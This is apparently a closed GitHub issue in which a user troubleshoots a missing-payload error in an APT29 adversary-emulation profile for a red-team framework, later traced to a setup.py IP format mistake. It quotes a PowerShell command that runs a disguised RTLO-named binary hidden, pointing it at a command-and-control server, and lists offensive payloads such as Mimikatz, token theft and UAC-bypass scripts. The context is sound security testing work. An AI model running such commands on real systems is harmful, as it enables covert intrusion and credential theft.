Closed Nexx1c closed 3 years ago
Hi,
I'm getting an error stating that the payload wasn't found when running the ATT&CK Eval APT29 - Day 1 profile:
Sleep 3;$bin = Get-ChildItem *cod*scr*;$arguments = '-server "http://40.87.138.119:8888" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;} __________________________ Payload(s) not available:
Most other actions seems to be working well: https://i.imgur.com/4z37FG5.png
The payload seems to exist in plugins/evals/payloads:
root@28323b9446f0:/usr/src/app/plugins/evals/payloads# ls 2016_United_States_presidential_election_-_Wikipedia.html StealToken.ps1 rar.exe stepSeventeen_zip.ps1 File-Collection.ps1 cod.3aka.scr.exe sandcat.go-windows stepSixteen_SID.ps1 Get-Screenshot.ps1 dmevals.local.pfx sandcat.go-windows-upx stepThirteen.ps1 Invoke-BypassUACTokenManipulation.ps1 invoke-winrmsession.ps1 schemas.ps1 stepTwelve.ps1 Invoke-Mimikatz.ps1 m.exe setup.py timestomp.ps1 Invoke-PSInject.ps1 make_lnk.ps1 stepFifteen_wmi.ps1 update.ps1 MITRE-ATTACK-EVALS.HTML monkey.png stepFourteen_bypassUAC.ps1 upload.ps1 Modified-SysInternalsSuite.zip powerview.ps1 stepFourteen_credDump.ps1 wipe.ps1 README.md ps.ps1 stepSeventeen_email.ps1 ''$'\342\200\256''cod.3aka.scr.exe'
I'm running v 2.6.6 in a docker if that could be causing any issues?
Found the issue.... Just wrote the IP without http:// and :port when running the setup.py... -_-
Hi,
I'm getting an error stating that the payload wasn't found when running the ATT&CK Eval APT29 - Day 1 profile:
Most other actions seems to be working well: https://i.imgur.com/4z37FG5.png
The payload seems to exist in plugins/evals/payloads:
I'm running v 2.6.6 in a docker if that could be causing any issues?